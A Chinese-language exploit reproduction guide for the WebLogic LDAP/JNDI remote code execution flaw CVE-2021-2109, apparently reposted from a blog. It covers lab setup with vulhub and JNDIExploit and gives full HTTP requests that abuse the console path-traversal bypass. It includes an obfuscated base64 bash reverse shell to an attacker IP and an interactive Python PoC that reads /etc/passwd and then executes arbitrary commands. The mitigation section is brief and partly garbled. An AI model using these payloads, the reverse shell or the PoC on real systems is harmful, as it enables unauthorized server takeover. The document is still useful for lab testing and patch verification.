漏洞名稱
- WebLogic LDAP遠程代碼執行漏洞
漏洞編號
- CVE-2021-2109
JNDI簡介
-
JNDI是Java Naming and Directory Interface (Java命名和目錄介面)的英文簡寫,
-
是為Java應用程式提供命名和目錄訪問服務的API (application programing interface,應用程式編程介面),
漏洞描述
-
2020年11月19日,阿里云安全向Oracle官方報告了Weblogic Server遠程代碼執行漏洞,
-
攻擊者可通過LDAP協議,實作JNDI注入攻擊,加載遠程CodeBase下的惡意類,最后執行任意代碼從而控制服務器,
影響版本
- WebLogic Server 10.3.6.0.0
- WebLogic Server 12.1.3.0.0
- WebLogic Server 12.2.1.3.0
- WebLogic Server 12.2.1.4.0
- WebLogic Server 14.1.1.0.0
實驗環境搭建
- 靶機: docker weblogic 192.168.232.183
- LDAP:192.168.232.146
- 攻擊機:kali ip:192.168.232.140
第一步 環境搭建
cd /Desktop/vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
第二步 訪問靶機環境(7001是WebLogic的默認埠,)
http://192.168.232.183:7001/
第三步 訪問漏洞點,查看是否有該漏洞
訪問http://192.168.232.183:7001/console/css/%252e%252e%252f/consolejndi.portal 如果有此頁面未授權可訪問,且WebLogic為受影響的版本,則可能存在漏洞,
第四步 啟動LDAP,
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
unzip JNDIExploit.v1.11.zip
java -jar JNDIExploit.v1.11.jar -i ip(攻擊機地址)啟動
復現步驟
第一步 配合WebLogic未授權漏洞,遠程進行代碼執行
GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.232;146:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1Host: 192.168.232.183:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
cmd: id
Cookie: ADMINCONSOLESESSION=gP6QBvU_6nELIrUKw_cS9md3rot7DdvT593UwSqzF20mWUOFjC7I!-1705112082
Connection: close
LDAP服務器地址的第三個分割符號為;
第二步 通過反彈shell,連接主機
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMi4xNDAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}
GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.232;146:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1Host: 192.168.232.183:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
cmd: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMi4xNDAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}
Cookie: ADMINCONSOLESESSION=gP6QBvU_6nELIrUKw_cS9md3rot7DdvT593UwSqzF20mWUOFjC7I!-1705112082
Connection: close
在/tmp下新建目錄2021,新建qwe.txt內容為123456
查看docker下的檔案
docker ps
docker exec -it 7f1c1a15677a /bin/bash
第三步 通過POC利用,進行命令執行
http://192.168.232.183:7001
ldap://192.168.232;146:1389
修復建議
-
由于是通過JNDI注入進行遠程代碼執行,建議升級Weblogic Server運行環境的JDK版本;
-
禁用T3協議如果您不依賴T3協議進行MM通信,通過暫時阻斷T3協議緩解此漏洞帶來的影響,1).進入 Weblogic控制臺,在 base domain配置頁面中,進入“安全"選項卡頁面,點擊篩選器",配置篩選器,2.在連接篩選器中輸入: weblogic. security net Connection FilterImpl,在連接篩選器規則框中輸入:**7001 deny t3t3s,
-
禁止啟用|OP脊陸Mebg控制臺,找到啟用|P選項,取消勾選,重啟生效
-
臨時關閉后臺/ console/console portal對外訪間
-
升級官方安全補
poc
import requestsimport sys
import re
requests.packages.urllib3.disable_warnings()
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: Weblogic 多個版本 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m')
print('+------------------------------------------')
def POC_1(target_url, ldap_url, cmd):
vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url)
print('\033[36m[o] 正在請求: {}'.format(vuln_url))
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"cmd": cmd
}
try:
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "root:" in response.text:
print("\033[32m[o] 目標{}存在漏洞 \033[0m".format(target_url))
print("\033[32m[o] 回應為:\n{} \033[0m".format(response.text))
else:
print("\033[31m[x] 命令執行失敗 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 請檢查引數和Ldap服務是否正確 \033[0m", e)
def POC_2(target_url, ldap_url, cmd):
vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url)
print('\033[36m[o] 正在請求: {}'.format(vuln_url))
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"cmd": cmd
}
try:
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[32m[o] 回應為:\n{} \033[0m".format(response))
except Exception as e:
print("\033[31m[x] 請檢查引數和Ldap服務是否正確 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
ldap_url = str(input("\033[35mLdap >>> \033[0m"))
POC_1(target_url, ldap_url, cmd="cat /etc/passwd")
while True:
cmd = input("\033[35mCmd >>> \033[0m")
if cmd == "exit":
sys.exit(0)
else:
POC_2(target_url, ldap_url, cmd)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/259180.html
標籤:其他